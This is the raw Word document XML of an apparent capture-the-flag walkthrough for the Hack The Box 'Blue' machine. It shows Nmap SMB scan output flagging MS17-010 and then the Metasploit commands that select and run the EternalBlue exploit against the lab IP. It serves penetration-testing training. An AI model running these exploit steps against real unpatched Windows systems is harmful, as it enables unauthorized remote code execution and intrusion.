          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>not vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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 xml:space="preserve">Nmap scan report </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.10.10.40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 xml:space="preserve">Host is up </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.20s latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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>PORT    STATE SERVICE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 xml:space="preserve">445/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-ds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>Host script results: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>|_smb-vuln-ms10-054: false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>|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND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 xml:space="preserve">| smb-vuln-ms17-010: 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>|   VULNERABLE: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 xml:space="preserve">|   Remote Code Execution vulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft SMBv1 servers </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms17-010</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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>|     State: VULNERABLE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 xml:space="preserve">|     IDs:  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE:CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-2017-0143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>|     Risk factor: HIGH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 xml:space="preserve">|       A critical remote code execution vulnerability exists </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Microsoft SMBv1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 xml:space="preserve">|        servers </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms17-010</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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 xml:space="preserve">|           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>|     Disclosure date: 2017-03-14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>|     References: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 xml:space="preserve">|       </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</w:t>
        </w:r>
      </w:hyperlink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 xml:space="preserve">|       </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2017-0143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 xml:space="preserve">|_      </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With the results of the previous scans, we were able to identify the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OS: Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Computer name: HARIS-PC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VULNERABLE smb-vuln-ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After identifying that our machine is vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are going to use a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module that allows us to exploit this vulnerability.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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[~/Desktop/APOLO/Ethic4l-Hacking/Operations/Premium/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blue]─</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[root@Arthorias]─[0]─[3672]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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╰</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">msf5 </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r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>msf5 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.10.40    </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013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3348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf5 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A86377" w:rsidRPr="0013348D" w:rsidRDefault="00A86377"/>
    <w:sectPr w:rsidR="00A86377" w:rsidRPr="0013348D" w:rsidSect="00E310A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ra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672B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9078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1345F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9950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17088D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B7E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48D"/>
    <w:rsid w:val="0013348D"/>
    <w:rsid w:val="00A86377"/>
    <w:rsid w:val="00E3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7B788"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{75797419-2254-408F-BD67-527B79416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34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334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334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4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334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3348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info-author-name">
    <w:name w:val="info-author-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013348D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00133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3348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334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3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348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3348D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13348D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013348D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nt">
    <w:name w:val="nt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013348D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013348D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013348D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00133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0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53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23" w:color="3E4250"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="205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8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43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2170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3E4250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thebox.eu/home/machines/profile/51" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?nam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nvd.nist.gov/vuln/detail/CVE-2017-0143" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 